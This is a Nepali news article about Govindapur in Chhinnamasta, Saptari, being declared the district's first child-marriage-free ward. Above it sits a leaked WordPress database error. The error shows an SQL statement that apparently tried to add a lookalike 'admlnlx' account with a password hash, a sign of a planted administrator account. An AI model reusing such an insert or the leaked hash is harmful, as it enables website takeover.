WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B3SBGjXPeCkhD4s/6iY17Mea5r8Jki1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 11:45:38', '', 'admlnlx', 'admlnlx')
सप्तरी, पुस १४–
सप्तरीको छिन्नमस्तामा बुधबार जिल्लामै पहिलो बालविवाहमुक्त वडा घोषणा गरिएको छ । जिल्लाको छिन्नमस्ता–४ गोविन्दपुरमा बुधबार एक कार्यक्रम गरी गाविन्दपुर बालबिवाहमुक्त वडा घोषणा गएिको हो ।
स्थानीयवासीका अनुसार वडा नं ४ मात्र बालविवाहमुक्त घोषणा गरिएको बताइएको छ । गाविस कार्यालय छिन्नमस्ताको सहयोग तथा गाउँ बाल संरक्षण समितिको आयोजकमा सम्पन्न भएको कार्यक्रममा वक्ताले यो वडामा मात्र होइन कि जिल्लाभरि नै बालविवाहमुक्त हुनुपर्नेमा जोड दिएका छन् ।
साथै बालबिवाह गर्नु सामाजिक अपराध हो भन्दै अब सबै मिलेर बालविवाह हुनबाट रोक्नुपर्ने वक्ताले आफ्नो तर्क दिएका छन् । गाविस सचिव सत्यनारायणलाल यादवको प्रमुख आतिथ्यमा सम्पन्न भएको कार्यक्रममा गाउँ बाल संरक्षण समिति छिन्नमस्ताका संयोजक प्रभुनारायण यादवको अध्यक्षता रहेको थियो ।
उक्त कार्यक्रममा विशिष्ट अतिथि सद्भावना पार्टीका केन्द्रीय सदस्य एवम् निवर्तमान अध्यक्ष सत्यनारायण यादव, महिला तथा बालबालिका कार्यालयका नियमित कार्यालय प्रमुख भावना घिमेरे, जिल्ला बाल कल्याण समितिका अधिकृत पुनम चौधरी, सेभ द चिल्ड्रेनका कार्यक्रम संयोजकद्वय उमेशकुमार गुप्ता र इन्द्रबहादुर हायु, सेभ द सप्तरीका कार्यक्रम संयोजक गोपालप्रसाद चौधरीलगायतका उपस्थिति रहेको थियो ।